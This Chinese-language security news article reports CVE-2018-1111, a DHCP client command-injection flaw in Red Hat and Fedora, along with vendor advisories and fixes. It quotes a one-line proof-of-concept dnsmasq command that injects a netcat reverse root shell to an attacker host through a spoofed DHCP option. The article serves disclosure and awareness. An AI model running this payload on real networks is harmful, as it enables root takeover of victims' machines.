谷歌研究员在红帽 (Red Hat) Linux 的 DHCP (动态主机控制协议)客户端实现及其衍生版本如 Fedora 操作系统中发现了一个严重的远程命令注入漏洞。

该漏洞的编号是 CVE-2018-1111,它可导致攻击者以根权限在目标系统上执行任意命令。

不管系统何时联网,正是 DHCP 客户端应用能够让系统自动从 DHCP 服务器中接收网络配置参数如 IP 地址和 DNS 服务器。

该漏洞存在于 DHCP 客户端包中的 NetworkManager 集成脚本中。DHCP 客户端包被配置为通过 DHCP 协议获取网络配置。

谷歌研究团队的研究员 Felix Wilhelm 发现,如果攻击者拥有恶意 DHCP 服务器或者和受害者连接到同一个网络中,那么他就能通过欺骗 DHCP 响应来利用这个漏洞,最终在运行易受攻击的 DHCP 客户端的受害者系统上以根权限运行任意命令。

尽管该漏洞的具体详情尚未披露,但 Wilhelm 声称自己的 PoC 利用码极短,甚至在一条推特上就能写下(一条推特最多能发140个英文字符)。

同时,土耳其的一名研究员 Barkın Kılıç 在推特上为这个漏洞发布了一条可转发的 PoC 利用码,如下:

(#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat)

红帽发布安全公告称,已证实该漏洞影响红帽企业版Linux 6 和7,而且所有运行受影响 dhclient 包的用户都应该在新版本发布后尽快予以更新。

红帽公司警告称,“用户可选择删除或禁用这个易受攻击的脚本,但是它将阻止由 DHCP 服务器提供的某些配置参数无法在本地系统上配置,如本地 NTP 或 NIS 服务器地址。”

Fedora 还发布了 DHCP 包的新版本,其中包含 Fedora 26、27 和28 的修复方案。

其它热门 Linux 发行版本如 OpenSUSE 以及 Ubuntu 似乎并未受影响,因为它们的 DHCP 客户端实现默认不具有 NetworkManager 集成脚本。

本文由360代码卫士翻译自TheHackerNews

声明:本文来自代码卫士,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。